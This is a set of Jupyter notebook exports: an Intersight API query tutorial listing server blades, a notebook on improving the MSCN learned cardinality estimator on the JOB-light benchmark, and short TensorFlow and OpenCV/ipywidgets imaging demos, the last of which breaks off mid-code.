NumThreads: 16 13 of 15 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 NumThreads: 16 14 of 15 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 NumThreads: 16 15 of 15 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 NumThreads: 16 ###Markdown --- Pagination, skip the first N results and return only the top X remaining results ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$skip=3&$top=5' ) # Display the results display_results( results=results, fields=[ 'Model', 'Serial', 'NumThreads' ] ) ###Output HTTP response: 200 OK Objects returned: 5 1 of 5 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 NumThreads: 16 2 of 5 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 NumThreads: 16 3 of 5 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 NumThreads: 16 4 of 5 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 NumThreads: 16 5 of 5 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 NumThreads: 16 ###Markdown --- Return objects in a certain order (select only certain properties) ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$orderby=Serial&$select=Dn,Serial,Model' ) # Display the results display_results( results=results, fields=[ 'Model', 'Serial' ] ) ###Output HTTP response: 200 OK Objects returned: 18 1 of 18 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 2 of 18 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 3 of 18 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 4 of 18 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 5 of 18 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 6 of 18 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 7 of 18 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 8 of 18 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 9 of 18 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 10 of 18 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 11 of 18 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 12 of 18 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 13 of 18 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 14 of 18 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 15 of 18 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 16 of 18 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 17 of 18 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 18 of 18 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 ###Markdown --- Return only a count of the matching objects, no objects or their properties ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$count=true' ) # Display the results print(f'Total matching objects: {results.get("Count")}') ###Output HTTP response: 200 OK Objects returned: 1 Total matching objects: 18 ###Markdown --- Return a count of matching objects with objects and their properties ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$inlinecount=allpages&$select=Dn,Model,Serial' ) # Display the results print(f'Total matching objects: {results.get("Count")}\n') display_results( results=results, fields=[ 'Model', 'Serial', 'NumThreads' ] ) ###Output HTTP response: 200 OK Objects returned: 18 Total matching objects: 18 1 of 18 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 NumThreads: N/A 2 of 18 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 NumThreads: N/A 3 of 18 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 NumThreads: N/A 4 of 18 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 NumThreads: N/A 5 of 18 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 NumThreads: N/A 6 of 18 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 NumThreads: N/A 7 of 18 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 NumThreads: N/A 8 of 18 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 NumThreads: N/A 9 of 18 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 NumThreads: N/A 10 of 18 DN: sys/chassis-3/blade-1 Model: UCSB-EX-M4-1 Serial: SRV107 NumThreads: N/A 11 of 18 DN: sys/chassis-3/blade-5 Model: UCSB-EX-M4-1 Serial: SRV126 NumThreads: N/A 12 of 18 DN: sys/chassis-4/blade-2 Model: UCSC-C3K-M4SRB Serial: SRV112 NumThreads: N/A 13 of 18 DN: sys/chassis-5/blade-3 Model: UCSB-B480-M5 Serial: SRV125 NumThreads: N/A 14 of 18 DN: sys/chassis-3/blade-3 Model: UCSB-EX-M4-1 Serial: SRV108 NumThreads: N/A 15 of 18 DN: sys/chassis-3/blade-7 Model: UCSB-EX-M4-1 Serial: SRV110 NumThreads: N/A 16 of 18 DN: sys/chassis-4/blade-1 Model: UCSC-C3K-M4SRB Serial: SRV111 NumThreads: N/A 17 of 18 DN: sys/chassis-5/blade-1 Model: UCSB-B200-M5 Serial: SRV122 NumThreads: N/A 18 of 18 DN: sys/chassis-5/blade-2 Model: UCSB-B200-M5 Serial: SRV124 NumThreads: N/A ###Markdown --- Group objects by properties and aggregate results by values- Group all servers by Model and display the average number of CPUs per model.- Supported aggregates include: - min, max, average, and sum ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$apply=groupby((Model), aggregate(NumCpus with average as AverageCpuCount))' ) # Display the results display_results( results=results, fields=[ 'Model', 'AverageCpuCount' ] ) ###Output HTTP response: 200 OK Objects returned: 4 1 of 4 DN: N/A Model: UCSB-B200-M5 AverageCpuCount: 2 2 of 4 DN: N/A Model: UCSB-B480-M5 AverageCpuCount: 4 3 of 4 DN: N/A Model: UCSB-EX-M4-1 AverageCpuCount: 2 4 of 4 DN: N/A Model: UCSC-C3K-M4SRB AverageCpuCount: 2 ###Markdown --- Group objects by the total count of a value- Group all servers by Model and display the total number of servers for each Model. ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$apply=groupby((Model), aggregate($count as TotalCountOfServerModel))' ) display_results( results=results, fields=[ 'Model', 'TotalCountOfServerModel' ] ) ###Output HTTP response: 200 OK Objects returned: 4 1 of 4 DN: N/A Model: UCSC-C3K-M4SRB TotalCountOfServerModel: 4 2 of 4 DN: N/A Model: UCSB-EX-M4-1 TotalCountOfServerModel: 8 3 of 4 DN: N/A Model: UCSB-B480-M5 TotalCountOfServerModel: 2 4 of 4 DN: N/A Model: UCSB-B200-M5 TotalCountOfServerModel: 4 ###Markdown --- Sort grouped objects with the `$orderby` parameter (using the `desc` keyword as an example)- Group all servers by Model and display the total number of servers for each Model. ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$apply=groupby((Model), aggregate($count as TotalCountOfServerModel))&$orderby=TotalCountOfServerModel desc' ) # Display the results display_results( results=results, fields=[ 'Model', 'TotalCountOfServerModel' ] ) ###Output HTTP response: 200 OK Objects returned: 4 1 of 4 DN: N/A Model: UCSB-EX-M4-1 TotalCountOfServerModel: 8 2 of 4 DN: N/A Model: UCSB-B200-M5 TotalCountOfServerModel: 4 3 of 4 DN: N/A Model: UCSC-C3K-M4SRB TotalCountOfServerModel: 4 4 of 4 DN: N/A Model: UCSB-B480-M5 TotalCountOfServerModel: 2 ###Markdown --- Include related resources with the queried resources ###Code results = intersight( method='GET', endpoint='/compute/Blades', params='$expand=Parent' ) # Display the results result_sample = results.get('Results')[0] print(f'Dn: {result_sample["Dn"]}') print(f'Parent Dn: {result_sample["Parent"].get("Dn")}') ###Output HTTP response: 200 OK Objects returned: 18 Dn: sys/chassis-5/blade-1 Parent Dn: sys/chassis-5 ###Markdown --- Search for resources- Allows the use of `$top`, `$skip`, `$orderby`, `$filter`, `$select`, & `$count` ###Code results = intersight( method='GET', endpoint='/search/SearchItems', # Single quotes required on the search string # Outer double quotes will work also, without escaping inner single quotes params='$filter=endswith(Dn,\'5\')' ) # Display the results display_results( results=results, fields=[ 'ObjectType', 'EpDn', 'Serial', 'TotalMemory' ] ) ###Output HTTP response: 200 OK Objects returned: 50 1 of 50 DN: sys/chassis-3/blade-5 ObjectType: compute.PhysicalSummary EpDn: N/A Serial: SRV126 TotalMemory: 49152 2 of 50 DN: sys/rack-unit-5 ObjectType: compute.PhysicalSummary EpDn: N/A Serial: RK58 TotalMemory: 49152 3 of 50 DN: sys/rack-unit-5 ObjectType: compute.RackUnit EpDn: N/A Serial: RK58 TotalMemory: 49152 4 of 50 DN: sys/chassis-3/blade-5 ObjectType: compute.Blade EpDn: N/A Serial: SRV126 TotalMemory: 49152 5 of 50 DN: sys/chassis-3/blade-3/adaptor-1/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-3/fabric-B/pc-1287 Serial: N/A TotalMemory: N/A 6 of 50 DN: sys/chassis-5/blade-1/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-5/blade-1/fabric-B/pc-1305 Serial: N/A TotalMemory: N/A 7 of 50 DN: sys/chassis-3/blade-7/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-7/fabric-B/pc-1284 Serial: N/A TotalMemory: N/A 8 of 50 DN: sys/chassis-5/blade-3/adaptor-1/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-5/blade-3/fabric-B/pc-1308 Serial: N/A TotalMemory: N/A 9 of 50 DN: sys/chassis-5/blade-1/adaptor-1/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-5/blade-1/fabric-B/pc-1304 Serial: N/A TotalMemory: N/A 10 of 50 DN: sys/chassis-5/blade-2/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-5/blade-2/fabric-B/pc-1301 Serial: N/A TotalMemory: N/A 11 of 50 DN: sys/chassis-5/blade-2/adaptor-1/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-5/blade-2/fabric-B/pc-1300 Serial: N/A TotalMemory: N/A 12 of 50 DN: sys/chassis-3/blade-1/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-1/fabric-B/pc-1293 Serial: N/A TotalMemory: N/A 13 of 50 DN: sys/chassis-3/blade-5/adaptor-1/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-5/fabric-B/pc-1280 Serial: N/A TotalMemory: N/A 14 of 50 DN: sys/chassis-5/blade-3/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-5/blade-3/fabric-B/pc-1309 Serial: N/A TotalMemory: N/A 15 of 50 DN: sys/chassis-3/blade-3/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-3/fabric-B/pc-1288 Serial: N/A TotalMemory: N/A 16 of 50 DN: sys/chassis-3/blade-5/adaptor-2/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-5/fabric-B/pc-1281 Serial: N/A TotalMemory: N/A 17 of 50 DN: sys/chassis-3/blade-1/adaptor-1/ext-eth-5 ObjectType: adapter.ExtEthInterface EpDn: sys/chassis-3/blade-1/fabric-B/pc-1292 Serial: N/A TotalMemory: N/A 18 of 50 DN: sys/rack-unit-5 ObjectType: compute.PhysicalSummary EpDn: N/A Serial: RK58 TotalMemory: 49152 19 of 50 DN: sys/rack-unit-5 ObjectType: compute.RackUnit EpDn: N/A Serial: RK58 TotalMemory: 49152 20 of 50 DN: sys/chassis-3/blade-5 ObjectType: compute.PhysicalSummary EpDn: N/A Serial: SRV126 TotalMemory: 49152 21 of 50 DN: sys/chassis-5 ObjectType: equipment.Chassis EpDn: N/A Serial: CH42 TotalMemory: N/A 22 of 50 DN: sys/chassis-3/blade-5 ObjectType: compute.Blade EpDn: N/A Serial: SRV126 TotalMemory: 49152 23 of 50 DN: sys/chassis-4/enc-1/disk-25 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: CHDISK694 TotalMemory: N/A 24 of 50 DN: sys/chassis-4/enc-1/disk-5 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: CHDISK674 TotalMemory: N/A 25 of 50 DN: sys/chassis-4/enc-1/disk-35 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: CHDISK704 TotalMemory: N/A 26 of 50 DN: sys/chassis-4/enc-1/disk-15 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: CHDISK684 TotalMemory: N/A 27 of 50 DN: sys/chassis-4/enc-1/disk-45 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: CHDISK714 TotalMemory: N/A 28 of 50 DN: sys/chassis-4/enc-1/disk-55 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: CHDISK724 TotalMemory: N/A 29 of 50 DN: sys/rack-unit-9/board/storage-SAS-1/disk-5 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: RKDISK476 TotalMemory: N/A 30 of 50 DN: sys/rack-unit-10/board/storage-SAS-1/disk-5 ObjectType: storage.PhysicalDisk EpDn: N/A Serial: RKDISK493 TotalMemory: N/A 31 of 50 DN: sys/rack-unit-6/equipped-slot-5 ObjectType: pci.Device EpDn: N/A Serial: RKCTLR79 TotalMemory: N/A 32 of 50 DN: sys/rack-unit-7/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 33 of 50 DN: sys/rack-unit-3/board/memarray-1/mem-45 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 34 of 50 DN: sys/chassis-4/blade-1/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2465 TotalMemory: N/A 35 of 50 DN: sys/chassis-4/blade-2/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2481 TotalMemory: N/A 36 of 50 DN: sys/rack-unit-3/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 37 of 50 DN: sys/rack-unit-3/board/memarray-1/mem-25 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 38 of 50 DN: sys/rack-unit-4/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 39 of 50 DN: sys/rack-unit-2/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 40 of 50 DN: sys/chassis-3/blade-3/board/memarray-1/mem-25 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2347 TotalMemory: N/A 41 of 50 DN: sys/rack-unit-10/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 42 of 50 DN: sys/chassis-3/blade-3/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2337 TotalMemory: N/A 43 of 50 DN: sys/chassis-5/blade-3/board/memarray-1/mem-45 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2787 TotalMemory: N/A 44 of 50 DN: sys/rack-unit-6/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: RKMEM1889 TotalMemory: N/A 45 of 50 DN: sys/rack-unit-8/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 46 of 50 DN: sys/rack-unit-3/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 47 of 50 DN: sys/chassis-5/blade-3/board/memarray-1/mem-35 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2777 TotalMemory: N/A 48 of 50 DN: sys/chassis-4/blade-1/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: SRVMEM2455 TotalMemory: N/A 49 of 50 DN: sys/rack-unit-4/board/memarray-1/mem-15 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A 50 of 50 DN: sys/rack-unit-10/board/memarray-1/mem-5 ObjectType: memory.Unit EpDn: N/A Serial: TotalMemory: N/A
notebooks/3-Cardinality_Models.ipynb
###Markdown 3 - Overcoming SOTA Performance On IMDB With JOB-Light*By Marcus Schwarting and Andronicus Samsundar Rajasukumar*In this notebook, we will:- Introduce the Kipf et. al. model that we wish to improve upon- Show various implementations of featurization routines, and discuss their pros and cons- Discuss changes to the Kipf implementation that yielded overall improvements in accuracy and training timeThe performance benchmark that we wish to beat, as described in the literature on the JOB-light test query set on the IMDB dataset, is as follows:| Metric | Value || ---- | ---- ||Median | 3.82||90th Percentile| 78.4||95th Percentile|362||Max|1110||Mean|57.9| ###Code #MODIFIED VERSION OF KIPF ET AL CODE (originally from https://github.com/andreaskipf/learnedcardinalities)# import time import os import torch from torch.autograd import Variable from torch.utils.data import DataLoader from mscn.util import * from mscn.data import get_train_datasets, load_data, make_dataset from mscn.model import SetConv ###Output _____no_output_____ ###Markdown Introducing Kipf MSCN ModelThe authors achieve the above benchmark performance by using a multi-set convolutional network (MSCN). We have re-implemented their methods with some changes that have marginally improved on the state of the art. Below we re-use some of their code infrastructure and point out important changes where they are applicable. ###Code def unnormalize_torch(vals, min_val, max_val): #Read from "imdb_max_min.csv" vals = (vals * (max_val - min_val)) + min_val return torch.exp(vals) def qerror_loss(preds, targets, min_val, max_val): #Returns Q-error, can also return MAE as desired. qerror = [] preds = unnormalize_torch(preds, min_val, max_val) targets = unnormalize_torch(targets, min_val, max_val) for i in range(len(targets)): if (preds[i] > targets[i]).cpu().data.numpy()[0]: qerror.append(preds[i] / targets[i]) else: qerror.append(targets[i] / preds[i]) return torch.mean(torch.cat(qerror)) def predict(model, data_loader): #The workhorse. Evaluates the final model and runs predictions. preds = [] t_total = 0. model.eval() for batch_idx, data_batch in enumerate(data_loader): samples, predicates, joins, targets, sample_masks, predicate_masks, join_masks = data_batch t = time.time() outputs = model(samples, predicates, joins, sample_masks, predicate_masks, join_masks) t_total += time.time() - t for i in range(outputs.data.shape[0]): preds.append(outputs.data[i]) return preds, t_total def print_qerror(preds_unnorm, labels_unnorm): qerror = [] for i in range(len(preds_unnorm)): if preds_unnorm[i] > float(labels_unnorm[i]): qerror.append(preds_unnorm[i] / float(labels_unnorm[i])) else: qerror.append(float(labels_unnorm[i]) / float(preds_unnorm[i])) print(f"Median: {np.median(qerror)}") print(f"90th percentile: {np.percentile(qerror, 90)}") print(f"95th percentile: {np.percentile(qerror, 95)}") print(f"99th percentile: {np.percentile(qerror, 99)}") print(f"Max: {np.max(qerror)}") print(f"Mean: {np.mean(qerror)}") def train_and_predict(workload_name, num_queries=1000, num_epochs=100, \ batch_size=100, hid_units=256, verbose=False,write=False): # Load training and validation data num_materialized_samples = 1000 dicts, column_min_max_vals, min_val, max_val, labels_train, \ labels_test, max_num_joins, max_num_predicates, \ train_data, test_data = get_train_datasets('all_train_queries.sql', num_queries, \ num_materialized_samples) table2vec, column2vec, op2vec, join2vec = dicts # Train model sample_feats = len(table2vec) + num_materialized_samples predicate_feats = len(column2vec) + len(op2vec) + 1 join_feats = len(join2vec) model = SetConv(sample_feats, predicate_feats, join_feats, hid_units) optimizer = torch.optim.Adam(model.parameters(), lr=0.005) #lr=0.001 originally train_data_loader = DataLoader(train_data, batch_size=batch_size) test_data_loader = DataLoader(test_data, batch_size=batch_size) model.train() for epoch in range(num_epochs): loss_total = 0. for batch_idx, data_batch in enumerate(train_data_loader): samples, predicates, joins, targets, sample_masks, predicate_masks, join_masks = data_batch optimizer.zero_grad() outputs = model(samples, predicates, joins, sample_masks, predicate_masks, join_masks) loss = qerror_loss(outputs, targets.float(), min_val, max_val) loss_total += loss.item() loss.backward() optimizer.step() if verbose: print("Epoch {}, loss: {}".format(epoch, loss_total / len(train_data_loader))) # Get final training and validation set predictions preds_train, t_total = predict(model, train_data_loader) if verbose: print("Prediction time per training sample: {}".format(t_total / len(labels_train) * 1000)) preds_test, t_total = predict(model, test_data_loader) if verbose: print("Prediction time per validation sample: {}".format(t_total / len(labels_test) * 1000)) # Unnormalize preds_train_unnorm = unnormalize_labels(preds_train, min_val, max_val) labels_train_unnorm = unnormalize_labels(labels_train, min_val, max_val) preds_test_unnorm = unnormalize_labels(preds_test, min_val, max_val) labels_test_unnorm = unnormalize_labels(labels_test, min_val, max_val) # Print metrics if verbose: print("\nQ-Error training set:") print_qerror(preds_train_unnorm, labels_train_unnorm) print("\nQ-Error validation set:") print_qerror(preds_test_unnorm, labels_test_unnorm) print("") # Load test data file_name = "workloads/" + workload_name joins, predicates, tables, samples, label = load_data(file_name, num_materialized_samples) # Get feature encoding and proper normalization samples_test = encode_samples(tables, samples, table2vec) predicates_test, joins_test = encode_data(predicates, joins, column_min_max_vals, column2vec, op2vec, join2vec) labels_test, _, _ = normalize_labels(label, min_val, max_val) if verbose: print(f"Number of test samples: {len(labels_test)}") max_num_predicates = max([len(p) for p in predicates_test]) max_num_joins = max([len(j) for j in joins_test]) # Get test set predictions test_data = make_dataset(samples_test, predicates_test, joins_test, labels_test, max_num_joins, max_num_predicates) test_data_loader = DataLoader(test_data, batch_size=batch_size) preds_test, t_total = predict(model, test_data_loader) if verbose: print(f"Prediction time per test sample: {t_total / len(labels_test) * 1000}") # Unnormalize preds_test_unnorm = unnormalize_labels(preds_test, min_val, max_val) # Print metrics print(f"\nQ-Error, {workload_name}:") print_qerror(preds_test_unnorm, label) # Write predictions if write: file_name = f"results/predictions_{workload_name}.csv" os.makedirs(os.path.dirname(file_name), exist_ok=True) with open(file_name, "w") as f: for i in range(len(preds_test_unnorm)): f.write(f'{preds_test_unnorm[i]},{label[i]}\n') print('Original (recreated and retrained) MSCN from Kipf et. al.:\n') start_time = time.time() train_and_predict(testset='job-light', num_queries=5000, epochs=1000, batch_size=100, hid=256) print(f'Total Time: {round((time.time()-start_time),4)} seconds') ###Output Original (recreated and retrained) MSCN from Kipf et. al.: Q-Error, job-light: Median: 3.829080001743435 90th percentile: 79.58870873669316 95th percentile: 381.1589145561346 99th percentile: 937.5885201549474 Max: 1271.7475329481463 Mean: 44.07001456032248 Total Time: 217.4167 seconds ###Markdown Adjusted Data EncodingBelow shows the difference between the original MSCN implementation of predicate data encoding versus our featurized predicate encoding. ###Code #### THE ORIGINAL CODE IS AVAILABLE FROM KIPF ET AL, mscn/utils.py #### def encode_data(predicates, joins, column_min_max_vals, column2vec, op2vec, join2vec): predicates_enc = [] joins_enc = [] for i, query in enumerate(predicates): predicates_enc.append(list()) joins_enc.append(list()) for predicate in query: if len(predicate) == 3: # Proper predicate column = predicate[0] operator = predicate[1] val = predicate[2] norm_val = normalize_data(val, column, column_min_max_vals) pred_vec = [] pred_vec.append(column2vec[column]) pred_vec.append(op2vec[operator]) pred_vec.append(norm_val) pred_vec = np.hstack(pred_vec) else: pred_vec = np.zeros((len(column2vec) + len(op2vec) + 1)) predicates_enc[i].append(pred_vec) predicates_enc[i] = predicates_enc[i].flatten() for predicate in joins[i]: # Join instruction join_vec = join2vec[predicate] joins_enc[i].append(join_vec) return predicates_enc, joins_enc #### OUR UPDATES TO KIPF ET AL DATA ENCODING SCHEMA #### def encode_data_NEW(predicates, joins, column_min_max_vals, column2vec, op2vec, join2vec): predicates_enc = [] joins_enc = [] for i, query in enumerate(predicates): predicates_enc.append(list()) joins_enc.append(list()) for predicate in query: column = predicate[0] operator = predicate[1] val = predicate[2] norm_val = normalize_data(val, column, column_min_max_vals) #MAJOR FEATURIZATION CHANGES HERE col_onehot = column2vec[column] oper_onehot = op2vec[operator] pred_vec = np.zeros(len(col_onehot)*len(oper_onehot)) for j in range(len(col_onehot)): if col_onehot==1: pred_vec[3*j:3*j+3]=oper_onehot*norm_val predicates_enc[i].append(pred_vec) for predicate in joins[i]: # Join instruction join_vec = join2vec[predicate] joins_enc[i].append(join_vec) return predicates_enc, joins_enc ###Output _____no_output_____ ###Markdown Predicate Encoding Scheme ComparisonOur main insight on improving the featurization is as follows. Suppose I have a query with the following predicates:$$(b0.2) \wedge (e=0.3)$$on some set of predicates $\{a,b,c,d,e\}$ where we assume each normalized attribute ranges between $[0,1]$.Assuming an upward limit of four predicates, the Kipf implementation would featurize this predicate set as follows:```(Predicate on a)[0 1 0 0 0 1 0 0 0.5] a b c d e = val -- AND --(Predicate on d)[0 0 0 1 0 0 1 0 0.2] a b c d e = val -- AND --(Predicate on e)[0 0 0 0 1 0 0 1 0.3] a b c d e = valFINAL REPRESENTATION (assuming a four predicate maximum):[0 1 0 0 0 1 0 0 0.5 0 0 0 1 0 0 1 0 0.2 0 0 0 0 1 0 0 1 0.3 0 0 0 0 0 0 0 0 0]Final Length of Predicate Featurization: 36(average of 7.2 values per table attribute)```By contrast, we choose to featurize this predicate set as follows:```[0 0 0 0.5 0 0 0 0 0 0 0.2 0 0 0 0.3 ] Final Featurization = = = = = Equality Operators a b c d e VariablesFINAL REPRESENTATION:[0 0 0 0.5 0 0 0 0 0 0 0.2 0 0 0 0.3]Final Length of Predicate Featurization: 15(constant average of 3 values per table attribute)```There are a number of benefits to this featurization. First, there is no upward limit on the number of predicates that can be placed in a query. The predicate featurization length has no dependence on the number of predicates in a query. There is also no order dependence; that is, presumably$$[\color{green}{\text{0, 1, 0, 0, 0, 1, 0, 0, 0.5,}} \color{red}{\text{0, 0, 0, 1, 0, 0, 1, 0, 0.2,}} 0, 0, 0, 0, 1, 0, 0, 1, 0.3, 0, 0, 0, 0, 0, 0, 0, 0, 0]$$and $$[ \color{red}{\text{0, 0, 0, 1, 0, 0, 1, 0, 0.2,}} \color{green}{\text{0, 1, 0, 0, 0, 1, 0, 0, 0.5,}} 0, 0, 0, 0, 1, 0, 0, 1, 0.3, 0, 0, 0, 0, 0, 0, 0, 0, 0]$$should map to an identical cardinality, and indeed be identical queries (we have merely switched the order of predicate operations), but have very different predicate featurized representations. It would appear that the MSCN is not flexible enough to recognize this difference. Even when aggregating over sets of predicates (as the MSCN can be adjusted to do), the improved predicate featurization still out-performs the previous implementation. ###Code print('Retrained MSCN Architecture with Updated Featurization:\n') start_time = time.time() #Note: We use this altered function on the back end with other utis, and integrate accordingly. train_and_predict_NEW(testset='job-light', num_queries=5000, epochs=1000, batch_size=100, hid=256) print(f'Total Time: {round((time.time()-start_time),4)} seconds') ###Output Retrained MSCN Architecture with Updated Featurization: Q-Error job-light: Median: 3.3707934686744982 90th percentile: 44.26868661918655 95th percentile: 197.39683996127513 99th percentile: 782.6566606666486 Max: 954.0733123971569 Mean: 41.41337581462835 Total Time: 210.5493 seconds
tfsimple.ipynb
###Markdown Simple Tensorflow image classification ###Code from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import tensorflow as tf import time import data_helpers beginTime = time.time() # Parameter definitions batch_size = 100 learning_rate = 0.005 max_steps = 1000 # Uncommenting this line removes randomness # You'll get exactly the same result on each run # np.random.seed(1) # Prepare data data_sets = data_helpers.load_data() ###Output _____no_output_____
examples/.ipynb_checkpoints/imaging_and_gui-checkpoint.ipynb
###Markdown Snap ###Code # test image stack arr = [] for i in range(50): b = np.random.rand(500,500) b= (b*(2**16-1)).astype('uint16') arr.append(b) # snap (MPL) button = widgets.Button(description='Snap') display.display(button) def on_button_clicked(b): img=arr.pop() plt.imshow(img, cmap='gray') display.clear_output(wait=True) display.display(plt.gcf()) button.on_click(on_button_clicked) # snap (CV2) button = widgets.Button(description='Snap') display.display(button) def on_button_clicked(b): img=arr.pop() cv2.imshow('Video',img) cv2.waitKey(30) button.on_click(on_button_clicked) ###Output _____no_output_____ ###Markdown Videohttp://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html ###Code # test image stack a = [] for i in range(50): b = np.zeros((500,500)) b[i:i+100, i:i+100]=1.0 b=b*255 b=b.astype('uint8') a.append(b) # video (MPL) (slow, doesn't work well) # for img in a: # plt.imshow(img, cmap='gray') # display.clear_output(wait=True) # display.display(plt.gcf()) # video (CV2) cv2.namedWindow('Video',cv2.WINDOW_NORMAL) for img in a: b = cv2.imshow('Video',img) cv2.resizeWindow('Video', 500,500) cv2.moveWindow('Video',0,0) display.clear_output(wait=True) print np.random.randn(1) if cv2.waitKey(30) >= 0: break cv2.destroyAllWindows() # video with button (CV2) button = widgets.Button(description='Live') display.display(button) def on_button_clicked(b): for img in a: cv2.imshow('Video',img) cv2.waitKey(30) display.clear_output(wait=True) print np.random.randn(1) button.on_click(on_button_clicked) ###Output _____no_output_____ ###Markdown GUI and BUTTONShttp://docs.opencv.org/2.4/modules/highgui/doc/user_interface.html ###Code button = widgets.ToggleButton(description='Live', value=False) def on_click(change): display.clear_output(wait=True) print change['new'] button.observe(on_click, names='value') display.display(button) import time b1 = widgets.Button(description='b1') b2 = widgets.Button(description='b2') def ctrlloop(): def b1_click(b): for i in range(10): print 'b1', i time.sleep(0.5) def b2_click(b): for i in range(10): print 'b2', i # dl = widgets.jsdlink((button, 'value'), (vid, 'value')) b1.on_click(b1_click) b2.on_click(b2_click) widgets.HBox([b1,b2]) play = widgets.Play( interval=160, value=50, min=0, max=100, step=1, description="Press play", disabled=False ) slider = widgets.IntSlider() widgets.jslink((play, 'value'), (slider, 'value')) widgets.HBox([play, 